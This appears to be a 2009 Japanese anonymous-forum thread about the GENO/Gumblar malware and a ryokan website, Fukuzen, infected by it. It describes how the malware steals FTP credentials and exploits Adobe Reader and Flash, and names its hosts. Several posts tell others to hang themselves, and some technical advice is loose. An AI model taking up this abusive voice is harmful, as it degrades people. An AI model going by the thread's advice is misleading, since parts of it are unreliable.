旅館ふくぜんは対応したのかな?
>>250 してない
ブログじゃ感染してるの認識してるっぽいんだがな
いつも当館のブログを閲覧いただきありがとうございます。
自宅のインターネット環境をADSLから遂に光へ変更!!
が、光のスピードでウィルスに感染し泣きそうな担当:福田です。
遂に自宅のネット環境が【光】になる!!
これは、現在とさほど値段が変わらずできることから
妻に了承を得て実現となりました。
http://fukuzen.seesaa.net/ マジキチ
教えたやれよw
暢気だな・・・。 こうして感染は広がるのか。
やっぱりメディアが事の重大さを伝えるべきなんだ
ふくぜん、重大さを全く分かっとらんなwwww
これまだ出てなかった気がするから一応貼っとく
「感染すると、さまざまな被害に」――最新Webウイルスを徹底解説
http://itpro.nikkeibp.co.jp/article/NEWS/20090522/330541/ 新しい情報はこのへん
----------------
FTPアカウントを盗み出す対象となるのは、感染パソコンだけではない。
感染パソコンが接続しているネットワーク(サブネット)が対象となる。
ウイルスは、ネットワークを流れるデータを収集するソフトを特定のサイトから
ダウンロードしてインストール。
そのソフトを使ってネットワークを流れるデータを監視し、FTPアカウントと
思われるデータを記録する。
自分のサイトが原因でウイルス入ってるのが気付いてないってこと?
■最大・最後の脆弱性は「人間」 と書いているのは、問い合わせにおもろいメールを返してきたトレンドマイクロなんだけど 252見たらすごく共感した
身内から心無い言葉を浴びせられるのも当然の報いだな・・・ふくぜん・・・。
>>252 感染したことはわかってるけど気にかけてないってことかな
ある意味尊敬するが関わりたくないな
ブログから予約のリンクとして貼ってある、YAHOO!トラベルは、「ふくぜん」削除してるな。
こまけぇことはいいんだよぉ!
だれだ、被害者とかいってふくぜんブログにコメントしたのはwww
コメ凸すんなよw
ふくぜんの人気に嫉妬
(TT)
ブログのコメ開放してあるならウイルスの詳細とか色々書いてあげればいいじゃない
いまどきリピータハブなんか残ってないだろ
感染するのが早ければ「FUKUZENウィルス」って名前になったのにな…
何というイメージダウン
VIP辺りに旅館のサイトがウイルス感染認識してるのに放置 とかってスレ立てたら祭りにならないかな なんてね
275 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 00:21:26
昨夜から踏んでるが変化はないぞ。 ふくぜん は。
知らずに放置してるなんかの企業や店の公式HPってどれだけあるんだろうね ―ってほども無いか・・・・
ブログ書いてる暇あるならウィルスの話もたのむよ
>>274 VIPなんかに立ったら
店が潰されてしまうんじゃないか?
>>257 の日経の記事が
>>267 のリンクの記事をほぼ訳して整理しただけってのがちょっと笑える
そういや新聞の日経の経済記事で、「おっ!なかなか鋭い!」って評価が高いやつは、
英フィナンシャルタイムズの社説を三日遅れで訳しただけだったりするのが殆ど。
社の体質なんかもしれんなw
Foxit Readerの脆弱性も利用される場合があるようですのでお気をつけて
もう名称 別名ふくぜんウィルスってのを一つ加えてもいいレベルだろw
ふくぜんでググルとちゃんと このサイトはコンピュータに損害を与える可能性があります。 って注意が出てるwwww
伊香保まで車で30分かからないぜ 今度ふくぜん行ってみようかな
ふくぜんウィルスってほのぼのしてるなw 誰か近くに住んでる奴か暇な奴が遊びがてら行って 何とかしてあげて
コロンブスは既出?
豚インフルじゃないけど ふくぜんにアクセスしたパソコンは安全が確認されるまで強制隔離なww
「サイト覗いたらウィルスに感染した」ってクレーム入れれば動くかな
運営で醜態晒してからチェッカーの人見て無いんだけど何処行ったの?
アフィチェッカー?
友達がGENOに感染しててクリーンインストールじゃなくて修復インストールで 直したって聞いたんだけどこの場合ウィルスは完全に駆除されたのかな? 一応、sqlsodbc.chmのファイルサイズとかは正常に戻ったみたいだけど。
さっきyoutube見てて閉じようと思ったらインターネットブラウザが大量に起動してタブも
大量に開かれたんだけど
>>1 に書いてある症状とは違う?
>>297 ブラウザの起動なら別の問題です
そもそもyoutubeだけではそういうことは起こらないと思います
>>298 GENOは関係ないですか
一応Aviraで検索していますがウィルスの他の可能性は
あるのでしょうか?
知 る か
Janeを変な立ち上げ方したら エラー画面が次々出てJaneを閉じれなくなって にっちもさっちもいかなくなって電源落として終了させてから 電源入れ直したら、BIOSでパスワードかけてたのにも関わらず メーカーロゴの後そのままwinが立ち上がって来るようになった
もっと相応しいスレがあるからそっち行ったほうがいいと思うぞw
絶対開かないで言うならアドレスそのまま張るなよボケ しかしバスター使えねーな
>>304 Adobe Flash Player の最新版にアップデート
Adobe Acrobat Reader の最新版にアップデート
上記をしてるのであえて踏んでみたが感染はしてないようだ。
>>299 他の何かである可能性はあるけどGenoとは違いそうです
スキャンしてるならおとなしくそれを待てば良いとおもいます
youtube以外にもいきましたよね
リンクは貼らなくて良いです
>>303 そこも無害じゃね?
ソース見ても何もなさそうだが
もしや解決したんじゃね?
なわけないだろ
googleで開いたらこの始末(IE8)
警告- このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。
検索のヒント:
前のページに戻って、他の検索結果を選んでください。
別のキーワードで検索してみてください。
または、ご自身の責任のもとで
http://www.fukuzen.com/ にアクセスできます。見つかった問題の詳細については、Google が提供するこのサイトのセーフ ブラウジング診断ページをご覧ください。
不正なオンライン ソフトウェアから保護する方法については、StopBadware.org をご覧ください。
サイトの管理者である場合は、Google のウェブマスター ツールを使用して、サイトの再審査を依頼できます。審査プロセスの詳細については、Google のウェブマスター ヘルプ センターをご覧ください。
Advisory provided by
314 :
308 :2009/05/24(日) 02:43:21
あれ? ダウンロードしたのなぜか問題なかったけど 感染してるね
315 :
305 :2009/05/24(日) 02:45:53
アドレスに貼り付けて開いた俺はもしかして・・・感染した?
316 :
308 :2009/05/24(日) 02:48:23
XPでダウンロードしたら感染部分もダウンロードできたけど Vistaだと問題の部分だけないのがダウンロードできるな
>>315 分からないのに何でそんなことするんだよ・・・
martuz死んでるから感染して無いよ
FUKUZENウィルス怖いれす
FUKUZENとして認知されたのか~??? やるね
321 :
305 :2009/05/24(日) 02:52:33
>>317 >>318 無茶して・馬鹿だね俺。
でも感染してないようで良かったd
安心してこれで寝られます。
C&C用の鯖は両方生きてるな これから何かしてくれるのかな
323 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 02:54:04
今現在はノーガードでもGENOに関しては感染しないよ
一時間後は知らんけど
>>323 グロ注意
たいしたことないけどw
本当に大した事ないグロでがっくりした
rottenでも行ってこいよ そして戻ってくるな
知るかヴォケ
グロスレ住民の俺の専ブラはその画像は激しく既出だとおっしゃっています。
_,,, _/::o・ァ しらんがな ∈ミ;;;ノ,ノ
adobe導入してなくても感染しますか?
確認するならレジストリ見るのが確実だけど DaonolFix使ってもいいんじゃないの
テンプレにある確認方法試したら大丈夫でした adobeはサイズが大きいのでfoxitを使ってますが 感染する可能性はありますか? 初心者質問ですみません。
adobe消しとけばおk
ありがとうございます。 安心して得ろサイトをパトロール出来ます。
ageには注意
ふくぜんから目が離せない
>>336 FoxItも脆弱性があったから、最新版にしておけ。
>>323 が俺が見てるスレにも張られてて
それに対して「これグロ+GENOウィルスだよ」ってレスがついてたんだが本当なのかな
もうgumblar.cn消えてるらしいしどうでもいいんだろうけど専ブラ使ってないと死んでたのか気になる
一応言っとくと俺が323張ったんじゃないからね
テンプレ戻ってて安心した
>>339 忠告ありがとうございます。
早速そうします。
アフィのテンプレよりは遥かにいいけど このテンプレも情報古いし適当だよな
>>343 お前みたいな文句いうだけのカスが一番存在価値ないけどな
馬鹿にスイッチ入ったか
やっぱり、Vistaにかえた方が無難なんだろうか・・・ XPにfirefox(noscript導入済)、ノートン先生、PG2でかろうじて凌いでるけど ネットに依存しているタイプだから活動スペースがかなり限定されてしまって毎日ストレスがorz ほとんどのサイトがJS使ってるから色々つらい
>>347 JSめんどいなら一時的に許可しまくればいいじゃない
まとめWikiを取っ払ってまでチェッカーを1に書いた奴のせいで反感を買う
>>348 それが出来れば楽なんですけどね・・・
感染を防ぐためにこんな縛りを強いてるわけでして
長い間、再セットアップしてないからそろそろバックアップを取って事前準備をしておいた方がいい時期なのかも
>>349 向いてないのは否めないですが、ネット歴は一応は10年(ただし、情報弱者)だから
すっかり依存しきってますよ
>>347 このウィルスがなければ普通にネットサーフィンしてたのかい
ソース見てなにもなければ一時許可してるんだけどそれはまた違うの?
今の所はアドビ製品のjsの項目オフにしてりゃいい話じゃない...か
>>340 俺は情弱だからよくわからんけど、このURLは踏んだ事があると専ブラが言っている。
いつごろ見たかよく覚えてないが、すくなくともGENO騒ぎが起きるよりは前。
アドレスを変えずに画像だけ差し替えたのならわからんが、そうじゃないなら
この騒動が起こる前からGENOが仕込まれていたか、340が騙されたかのどっちかだ。
>>354 ブラウザのオフでも効果あるでしょ
もちろんこれ以外にも有効だからそうしてるんでしょ
GENOはまた店の名前変えたら幸せになれる
まー、Adobe Readerは必要な人が多いんじゃないか 他にPDFを扱える似たようなものがあるにしても使い勝手も違うだろうし 私は潔くアンインストールしたけど Flashはネットをやっている以上はさすがに必要
もう解決したね 次スレいらないね
他のソフトに慣れればいい
Win2k、IE6のセキュリティ中低、FlashPlayer9.0.159.0、AcrobatReader5.0の俺が感染していないですよ
AVAST入れてたもんで勝手に遮断してくれてた これ騒ぎになってないときだったから何も知らなかったわ
小林製薬とmaidoさん以外でウィルスについて報告したサイトはある?
maidoって?
maidoだけで分かる前提で書き込むとかウザイわ・・・
maido3じゃん。普通に。
>>363 それが感染していないんだよね。何でかは知らんがマジでw
>>368 亜種はcmd.exe、regedit.exeも起動するよ...
>>368 お気に入りサイトが感染していないんだろ
運がいい
大事な所でタイポすんなや解りづらい
やばい終わった
やばいどうしようどうすればいいんだ助けてくれ
てか駆除できないってのが信じられないんだけど、 再起動とか何かEXEを消すとかサービスを止めればいいんじゃねーの?
>>369 >>370 一週間ほど入院していてGENOウイルスの事知らなかったんすよ
お気に入りに入れておいたサイトが結構404で何でかな?っと知り合いにメールしたらこのスレ教わったっす
カスペルスキーのオンラインでJAVAが必要なのか・・・めんどくせ
>>374 駆除はできるよ。全亜種の駆除ができるかはわからんけど。
ただ、駆除してもchmファイルは書き換えられたままだし、クリーンなものに
差し替える必要がある。
他にも書き換えられるシステムファイルがあるかもしれない。
クリーンなシステムファイルを書き戻す方法はSymantecのサイトに書かれているけど、
クリーンインストールしてしまった方が安心できる。
>>376 もちろんクリーンが安定なのは承知の上です。
ただ.chmなんてヘルプファイルだし、もしこれがおかしいとヤバイってんなら、
これはMS04-023/MS05-026あたりの全然違う脆弱性でしょ。
それならAdobeには罪はないですし、WinXP SP3なら感染はしません。
まあ.chmならIEの脆弱性を突かれてる可能性もあるけど。
380 :
374 :2009/05/24(日) 06:48:38
ふっるいFlashしか入ってないVirtualPCでふくぜんを開いたら 「Flashをインストールしますか?」だってorz そこでインストールしたら最新版が入っちゃうじゃんかよ。 WireSharkによると確かに全然関係ないところからjquery_utf8.jsってのを 落とそうとしてるから、何かしようとしてるのは間違いないな。もう少し調べるわ。
>>377 Genoに利用されているAdobeの脆弱性がどんなもので、それを突かれた場合、
どういうことが可能なのか調べてみな。
383 :
374 :2009/05/24(日) 07:07:34
>>382 一応そいつは調べた。今のところPDFとSWFを最初の突破口にされるのは間違いない。
おそらくふくぜんの場合はSWFを狙ってる。
ただ今Adobeに行くと最新のFlash10しか落とせない(そりゃそうだわな)。古いFlashが
残ってるPCを調達しなきゃいかんのかな。
「既に感染してるVirtualPC」ってのを作って解析したいんだがな・・・
チャレンジャーあらわるあらわる
>>383 調べたのにどうして
> ただ.chmなんてヘルプファイルだし、もしこれがおかしいとヤバイってんなら、
> これはMS04-023/MS05-026あたりの全然違う脆弱性でしょ。
なんてことになるの?
もうやめた方がいいと思うよ。
今はウィルス本体が落ちてこないからいいが、その程度の理解じゃケガするよ。
まあ、釣りだろうね
388 :
374 :2009/05/24(日) 07:25:13
>>386 オレが知りたいのは既に感染してしまった場合駆除
できないかどうかだから、たとえばHKEY_LOCAL_MACHIN\〜\Runに
何か仕掛けるのかとかそういうことを調べたかったんだよ。
なんだウィルス本体はもう消えてるのか? それじゃ意味ないな。
>>385 ありがとう。ふくぜんの結果は報告する。
389 :
374 :2009/05/24(日) 07:25:46
すまん。MACHIN\じゃなかったMACHINE\だ。
>>388 おーがんばってくれ
インストールはどうやるんですかなんて聞くなよ
朝から糞ワラタ お前が調べるとか冗談だろ
>>388 感染させたいなら検出可否報告スレに上がってる検体を実行しろよ。
やめた方がいいと思うけどね。
VMに感染させた場合、無防備だとホストOSも平文パスワードを抜かれるぞ。
393 :
374 :2009/05/24(日) 07:37:53
ああトラフィックを見て送るってヤツだろ。 まあここまで情報が出てない以上誰にもわかんないんだろうな。 煽られてもしょうがない。 しかし感染した人にクリーンしろってのはちょっと酷だから 何とか止められないもんかという、それだけなんだよ。 しかしおかしいな。確かに9r16ってのが入ったが、バージョン確認でも出てこない。
>>380 > WireSharkによると確かに全然関係ないところからjquery_utf8.jsってのを
Wiresharkの使い方もわかってないだろ。
jQueryはルートのScriptフォルダから落ちてくるし、それはWebデザイナーの
設計通りの動作だ。
中身はGENOが追加されているけど。
一般の人が感染したならクリーンインストールしたほうが何かと安全じゃないすか? 大切なものはバックアップとっておけばいいし、そんなに面倒でもないし・・・ いや、面倒か?
>>393 こことネ板の過去ログ読んだ?
情報が出てないんじゃなくて理解できてないだけだろ?
パーティションでシステムとデータを分けた環境ならリカバリーが30分で済むし楽
Nyftyでスキャンしてみたが 見つかったウイルス:9 感染したアイテム:8 / 0 スキャンしたファイル:21926 疑わしいアイテム:2 スキャンプロセスの経過時間:00:42:00 リカバリしてきまっす
>>393 >まあここまで情報が出てない以上誰にもわかんないんだろうな
今頃出てきて何言ってんだwww
散々検証が繰り返されて情報も対応策も出切ってるよ
そのおかげで初心者の間でプチパニックになってたのもやっとおさまって
ぼちぼち落着きを取り戻し始めたところなのに空気読めてなさすぎ
つーか今までの流れすらちゃんと読んでもいないくせに
俺がなんとかしてやる的な思い込みしてるところが勘違いも甚だしい
GENOウイルスの亜種は今後も出てきて難読化も進むだろうが 「JavaScript+既知のAdobe脆弱性」の感染手法が変わらない限り 基本対策をしっかりしてれば仮に検出できなくても感染しないから関係ない 逆に、既に感染した奴がOSクリーンインストールするのは常識中の常識 仕込まれたファイルが検出可能な周知のコードパーツだけとは限らないからな そんなことも理解できない馬鹿は窓からPC投げ捨てて回線切って首吊っとけ
騒ぎすぎだよ大したことないだろ 店名晒して逆に営業妨害で訴えられたらどうするの?
じゃあ各ニュースサイトもGENOウイルスの名前出してるから訴えられそうだな
いやー久々に面白いおばかちゃんを見たなw
ポート445を閉じたらネットに繋がらなくなったんだが…
2ちゃんくらいなら携帯でもできますけど
再度ポートを開いたってことも
セキュリティパッチ当てているので今まで軽く流してきたんだけど、 いまさらだけど、FTPのパスワードを盗むってのに興味を引いた。 GENOウイルス感染後の話ではなく、GENOに限らず感染前のサーバー管理者向けの一般的な話として、 FTPを使わずにSFTPを使うって話があまり話題になっていないみたい。 このウイルスはなぜFTPパスワードを抜けるのか?それはFTPプロトコルが暗号化されていないから。 FTPプロトコルを使うことは本質的に危険。同じ理由で暗号化されていないTELNETを使うのも危険。 なのでTELNETの代わりにSSH、FTPの代わりにSFTPを使いましょう。 SSHは普通はどのサーバーでも対応しているはず。またFTPはSSHを解して通信を行うため SSHが使えるサーバーならSFTPも使えるはず。だからサーバー側のファイアウォールでFTPを許可する必要すら無い。 クライアントソフトとしてはFileZillaがSFTPに対応している。俺のお勧め。 日本ではFFFTPが人気があるみたいだけど、SFTPには直接対応していないみたい。 でもちゃんと設定すればFFFTPでもSFTPを使えるのでどうしてもFFFTPを使いたい人は調べてほしい。
sshやsftp使うのはサイト管理してる人にとっては常識でしょ。 秘密鍵認証のみにしてポートも変えておけばかなり安全。
人に意味不明なメール送りつけたりきもい ウイルスなんてずっと騒いでるのお前らだけだから。 これだからオタクは嫌われるんだよ・・・こわい
>>412 いやいや、その常識に反してFTPを使っているから
このように感染拡大しているわけで。
日本では(なぜか)人気のFFFTPがSFTPに対応してないみたいだしさ。
どうもSSHにくらべてSFTPに知名度が低い気がするのよ。
世の中バカが多いし、sshが使えないレンタルサーバもかなりあるんでない?
>>413 で、感染したらまっさきに泣き付きにくるんですね
企業向けや玄人向けのレンタルサーバならSFTPやFTPSに対応してるはずだが、 証明書の用意が面倒なんで素人向けのカンタン激安系サーバは対応してないかもな。
感染してるどっかのサイトの管理人さんかな
バスターってもう対策してるんだよね?
>>416417 判で押したように同じ反応してる方が怖いから
どうせ2ちゃんに洗脳されちゃったんだろ?
仮にどこかのサイトが感染してお前らに何の関係があるの?
お前らがなんとかしてやれるの?意味不明な長文メール何通も
送られてもただのスパムと同じだろ
これだからパソコンオタクはきもいんだよ
>>422 感染しちゃったの?
どうでもいいなら放っておけばいいんじゃないの
そのうち誰からも相手にされなくなってちょうど良くなるからなw
>>406 おいらは全部のポートを閉じてネットしてるよ
これセキュ板住人の常識な
>>422 伊香保温泉の中の人?
なら、とっとと対策を講じろよ。
>>422 君らにとっては意味不明な事象なんだろうね 知らないうちに人に迷惑かけてることを思ってください
とりあえず意味不明な長文メールとやらを晒してからだな 誰にとっても意味不明なのか、それとも読んでる方がバカなだけなのか
家に泥棒が毎日入ってるのを気付かないから教えてあげたら 「うるせーから黙ってろ、迷惑なんだよ!」って怒っちゃった感じ ショップとかのサイトならそのうちどこからもリンク外されるから別にいんじゃねーのww
ふと思ったんだが、NoScriptなどを使わなくても、 「今見ているページとは違う(外部の)ドメインのFlashを読み込まない」 ようにできれば、感染自体は回避できるんじゃないか?
>>426 一般人なら1週間ROMってればできる
池沼だと3年ROMってればできるかも
うちのもウイルスバスターなんだけど、ついさっきGENOウイルスについて知った。 バスターもってたら対策しないで安全なのかな?
>>422 一理あるがここの住人に言っても無駄だと思うよ
解ってる人から見たら、”対策しろ”の一言で済む話だからね
前々前スレくらいで一般人にどうやって説明しようか検討してた
まぁ普通はそんなもんでしょ。
バスター使いが製品のクオリティと同様にレベル低いのは何故なんだぜ
438 :
422 :2009/05/24(日) 12:30:12
大漁ですわ^^
おつかれさん
422だけど、じゃあ対策しろって言ってる奴らは、感染した人に何がしてやれるって話よ? 寄ってたかって対策しろじゃ感染するレベルの人になんて解るはずないだろうに ただうるさいだけだ
ショップサイトなら客が離れてモールのリンクも外されるだろうし 普通のサイトだとしても全部リンク外されるだろうし インフルエンザに罹って街中でウイルスばら撒いてるのがそんなに楽しいならそのままでOK
ロリポップのサイト漁ったがSFTP検索かけてもでてこねー
>>433 最近はexplicitモードを区別してFTPESと呼ぶのか…勉強になったぜ
>>355 なるほどthx
GENOって画像開いて感染するのか?とか気になってたわ
ただのデマかね
よんだ?
>>437 いや、NoScriptみたいに処理が重めの奴を使わずにやるには、って意味で。
改竄されて攻撃サイトにリダイレクトさせてる時点で 懇切丁寧に説明してやる必要なんてないと思うが 「おたくのウェブサイト開いたらアンチウィルスソフトが警告を出した。どうなってるの?」で十分だろ 後の調査と対策はサイト管理者の責任
>>441 あんた、ふくぜんのブログにコメントした人?
荒らしにしか見えないのもいくつかあるけども。
じゃあ、そこまで言うなら何がしてやれるの?
具体的に何も出来ないならメール送りつけたり
コメントしたりしつこい荒らしと変わらんと思うけどね。
長々とウイルスの説明されたって相手にもされないよ
453 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 12:42:25
えっ、
ふくぜんの中の人なの?
なにそれこわい
それが中の人だったら感染などしてないはず
>>449 NoScript程度で重いならOperaでも使った方がよくね?
>>440 >>452 対処法が分からない馬鹿は、窓からPC投げ捨てて回線切って首吊っとけばいいと思うよ
感染しちゃった中の人は誰かわかる人に任せるしかないでしょ それまでサイトは放置されるんだな・・・
>>457 得意げなその態度が一般人からきもいって言われる一因でしょ
窓から捨てる云々も良くみるコピペだし。その前に対策して(させて)あげてね
>>449 外部鯖ドマインを使わないネットはありえナス
>>459 馬鹿じゃなければ、まとめサイトでも見れば対処法が分かる
馬鹿は、金を何万か用意してパソコンレスキューみたいな業者に頼むか
金がなければ窓からPC投げ捨てて回線切って首吊っとくしかない
>>461 その態度が放置ときもい発言を招いてるわけですが。
パソヲタじゃない奴らにまとめとやらをわかるように説明して
情報が不透明だから、完璧な対処の使用法もないからなぁ
とりあえず、ふくぜんに関してはホスティング先のabuseにもメール送っておいたけど、 そっちも反応ないな。
>>459 つまり一切メールしたりコメントつけたりするなって言いたいの?
そうして管理者は気付かず、いつまでも改竄されまま放置されてればいいと
ブログ見に行っちゃったよ 別に荒れていないけど削除したのかな?
467 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 12:57:33
嵐って程の書き込みは元々無かったと思われ
>>462 まとめ読んでも分からないorまとめがどこにあるのかさえ分からないなら
自分が馬鹿であると素直に認めて有料サポート業者に頼め
まぁブログの2個目までのコメントは無いわな・・・
長文メール云々とか中の人しかわからないような事書いてる時点で・・・
>>465 散発的にきたら気持ち悪いんでないのかね
旅館の中の人もわかってるみたいだし誰かに頼むんじゃね
>>471 何個か前スレにすんごい長文メールあったよ
丁度、ukokkeiが発覚した頃。
>>464 tsukaeru.netってabuse死んでるっしょ。
エラーが返ってきたから。Webフォームから連絡入れておいた。
非ユーザーからの問い合わせは月曜まで放置される可能性が
高いけど。
>>463 攻撃側は常に進化するから特定のウイルスの説明は陳腐化して逆効果
感染の簡易診断やスクリプト検査ではシロ判定される亜種も既に量産体制
しかし何もビビる必要は無い
・ソフトウェアをアップデートして最新にする
・JavaScriptやプラグインを原則無効にする
この2つの基本対策がきちんと出来てる奴は
仮に感染サイトを踏んだとしても対岸の火事で終わってる
>>474 ああ、そうだった。俺もWebフォームで送り直した。
送ったの昨晩だから、確実に明日までは放置されるね。
おらパソオタども感染したから直し方教えろ つーか俺はオタじゃないからやる気ないからおまえらが責任もって直せ って言われてもww
>>477 そういう馬鹿って人として生きていけるのだろうか
>>478 残念なことに今現在まで生きてこられたようです。
至極迷惑なことに。
>>478 強毒性の新型インフルエンザで死ぬと思う
おら医者ども感染したから治し方教えろ
つーか俺は医者じゃないからやる気ないからおまえらが責任もって直せ
って言われてもww
増水した川の中州に取り残されて助けられて悪態ついてるDQNのような人種もいるのでねぇ
>>452 長文コメントでウイルス云々言われても、正直お節介な奴と思ってる?
コメ見るまでは気がつかなかったということですよね?
>>483 感染気づかずに放置してウィルス媒介所になってるほうが迷惑だから。
その長文メールとやら見せてくれないか
なんかすげーな。 ふくぜんのサイト構築を請け負ってる業者とかだったりするんだろうか。
ふくぜんは問題ない
ふくぜんは被害を被った側だね
うん、だから切れるのもわかるけど 切れる相手を間違えないでネット
無能達に告ぐ! 無能達に告ぐ! 過去のウィルスで騒ぐな
なんか今見たら、ふくぜんのサイトぐしゃぐしゃで文字化けしまくり。 トップページについてはGENOのコードが消えてるっぽいけど、 オンラインで作業してるのか?
>>487 ふくぜんはGoogleやブラウザが警告出してアクセスできないから問題ない
>>488 インフルエンザと同様、被害者が即加害者になるのがウイルスなんですけどね
>>490 君にとって過去のものだったとしても、今こうして感染、被害が広まってる今そんなことは過去もくそもない。
コメントの内容に、ふくぜんに落ち度があるとか何とかだったんじゃないかな 確認のしようが無いんだけど・・・ でも、ここで誰ともわからんのに文句言ってみても始まらない
>>491 俺もぐちゃぐちゃ目撃した。
今リロードしたら直ってた。修復完了か?
>>493 だからさ、ふくせんでサイト監理してる訳じゃないんでしょ
知らせて上げる事は出来ても対処のしようが無いのとちゃうの?
しかしこの流れで復旧とは… マジで関係者だったのか
>>496 まだ下の方が変。オフラインで編集すればいいのに。
>>493 >>494 これだから無知は
感染なんて義ろまっていないし被害も出てない
ふくぜんに謝罪しろヴォケ
>>498 ふくぜんに知らせる→ふくぜんからWebページ管理会社へ連絡→対策
修復完了しますた またのご来店をお待ちしております
関係者がここで文句言いながら修復作業かよ。器用だなw
最初から素直に感染認めて普通に対策の手助け求めてればいらぬ争いは生まないんだよ。 煽りながら対応とか器用なことしなくていいです。
今日は朝からずっと変な流れだなw
俺としては、一度感染したサイトが復旧後に再感染する確率の高さに注目してる
おまえらきもいよ(笑)
513 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 13:58:12
人に迷惑かけといて悪びれもしないって、たしかにきもいね(笑)
515 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 13:59:40
窓からPC投げ捨てて回線切って首吊っとくしかない
516 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 14:00:20
えっ、なにそれこわい
昔の2ちゃんねるのようだ
えっ
最大最強のウイルスは人間なんだな
ああ判った、今朝解析うんぬん行っていた人か>中の人 本当にお客さんに感染していた場合の対処法を知りたかったんだね
正直、新種がどんどん出てくる状況では 「昔のファイルが検出できる」で安全宣言出す行為は 感染拡大に加担してるようなもんだな
一時期、やたらと終息宣言出したがる/出させたがる人続出だったもんなあ あれは何だったんだろう
とりあえずGENO社員だろと思う事にしている
うめ
ふくぜん直ったみたいだなw
直ったのか? まだGoogleで遮断されるが
永遠に遮断しておけ
>>527 This page seems to be <suspicious>
>>528 Googleは管理者が申告して、それをGoogle側がチェックするまで解除されないよ。
感染確認したんで、初期化するつもりなんだが 感染後にリカバリ取っても意味はないのか?
Gumblarとは 【GENOウイルス】 - 意味-解説-説明-定義 : IT用語辞典
http://e-words.jp/w/Gumblar.html 2009年5月から急激に感染が拡大したコンピュータウイルスの一種。
「GENO」という名称は、国内で早期に感染したパソコンの通販サイトから
ついた通称で、ウイルス対策ソフトベンダーなどでは「Gumblar」や
「JSRedir-R」の名称で呼んでいる。
Gumblarは感染したコンピュータの管理するWebサイトを改ざんし、
感染用のJavaScriptコードを仕掛ける。
このコードはAdobe ReaderやFlash Playerの脆弱性を利用したもので、
これらを最新版に更新していないユーザは、
サイトを閲覧することにより感染する。
Gumblarは感染したコンピュータのネットワーク通信を監視し、
そのユーザがFTPを用いてどこかのWebサイトを管理している場合、
そのパスワードを盗み出してWebサイトを改ざんし、
感染用のコードを埋め込む。
また、感染したコンピュータのWebブラウザの挙動を操り、
Googleの検索結果に悪意あるサイトへのリンクなどを表示させる。
外部から操作できるような仕掛け(バックドア)も埋め込まれてしまう。
念のためにリカバリしようと思うんですが 感染している可能性があるパソコンに入れていたDVDや繋いでいた周辺機器を GENOウイルスに対応したアンチウイルスソフトでスキャンした結果無事でも、 対応してない亜種とかは感知、駆除できないですか? あと、もし感染してたら周辺機器やDVDのウイルスは駆除する方法がありますか? パソコンだとリカバリしかないそうですが、DVDは諦めるしかないんでしょうか。
基本的にデータには付着しないので、データバックアップと書き戻しはOK(HTMLはチェックした方が無難かも) HDDを外付にしても、削除はできても駆除(Windows本来のファイルに戻すとか、ゴミ設定抹消)はできないので おとなしくPCリカバリかOS再インストールしとけ。
感染したPCのHDDや感染後に使用したUSBメモリ等のデータは完全消去が原則 素人の大半が感染ディスクからデータを取り出して再感染して復旧作業をやり直す GENOウイルスの話じゃないけど 金にものを言わせて「PCを買い換える」最終手段を使ったくせに データを使いまわして即感染させた馬鹿もいたな
>>536 >>537 ウイルス感染の可能性でリカバリする場合はバックアップも諦めた方がいいということでしょうか。
>>538 理想論は
>>537 だが現実的には破棄できないファイルもあるだろうから
必要なファイルはとりあえずバックアップを取って
PCが復旧してからウイルスチェックをして再利用するのは割と日常茶飯事
>>539 ありがとうございます。あと一つだけ質問があるんですが、
テンプレでは駆除はクリーンインストールしかないとありますがリカバリでも大丈夫ですか?
メーカー製のパソコンはクリーンインストールはできないと聞いたのでリカバリしか無理なようなんですが
リカバリでも大丈夫でしょうか。
541 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 15:53:07
感染サイトみているとヘアサロン多いな
まったく、ハゲやがって
>>540 パソコン用語 - リカバリとは
パソコンを購入したときの状態に戻す作業のことです。
ググレカス
>>540 とりあえずリカバリして、まだ感染してたら、そのとき考える
ファイルのバックアップも同じ。とりあえずバックアップして、
もしウイルスが残ってて再感染したら、そのとき考える
感染が残ってたら1からやり直しになるけど、運が良ければ復旧する
そんな程度のやり方でも、世の中なんとか回ってます
>>543 メーカーPCのリカバリは、CD/DVDのリカバリディスクを使うとは限らんからな
HDDからのリカバリだと、リカバリ領域が汚染されてる可能性がある
>>543 ググってみたんですがリカバリだとクリーンインストールと比べて感染の可能性が残るかなどが
よくわかりませんでした。
>>544 ありがとうございます、とりあえずやってみます。
今の所GENOチェッカーでもGENOウイルスに対応したアンチウイルスソフトのスキャンでも
検出はされてないんですが、亜種を考え出せばリカバリしてもこのままでも全く感染してないとは
言えない状態ってことでしょうか。
その辺りはあまり考えすぎても今はどうしようもないくらいに思っていればいいような状態ですか。
DtoD
548 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 16:09:41
そういえば、インストールCD/DVDからのインストールでも、上書きだと 危ないかもしれないな。Zlkonの時にsystem volume informationに.exe ファイルが潜伏しているという報告があったんだ。 上書きインストールだとsystem volume informationは保存されるんじゃないかな? 一度パーティションを全消しする再インストールじゃないと不完全な気がする。
ちなみにとあるPCサービス会社にやってもらうと ウイルス除去→50000ぐらい リカバリ→30000ぐらい
>>537 プログラムもデータの一種だというなら、そうかもしれんがな。
一般論としては、データを破壊しない。
マクロ型のようにデータに潜むものもあるが、PCリカバリ→WindowsUpdateとセキュリティソフト導入→データ戻しと
正しい手順で行なえば、データに取り付いてるものでも、セキュリティソフトがチェックしてくれるので、
データをバックアップして、あとから書き戻して構いません。
>>537 の言うような再感染は、適切なセキュリティソフトを導入せずに、データを戻そうとした場合に発生します。
AutoRun型とかっすね。GENOでは、その型は確認されてないので、心配せずに、データバックアップしてから
リカバリしちゃってください。
>>545 基本的にOSからは見えない領域になってるので、その可能性は著しく低いがな。
>>540 復旧方法は、PCリカバリまたはOS再インストールです。リカバリで問題ありません。
>>546 リカバリと、(HDDフォーマットして行なう)クリーンインストールは等価だと考えていいです。
どちらも、現在のファイルは残りません。
クリーンインストールでも、OS部分の抹消だけ行なうものは、HDDにデータが残っており、セキュリティソフト
導入前に、残されたファイルのうち、感染しているプログラムに触って、再感染するケースも有り得ますが
そこまで心配しなくていいです。
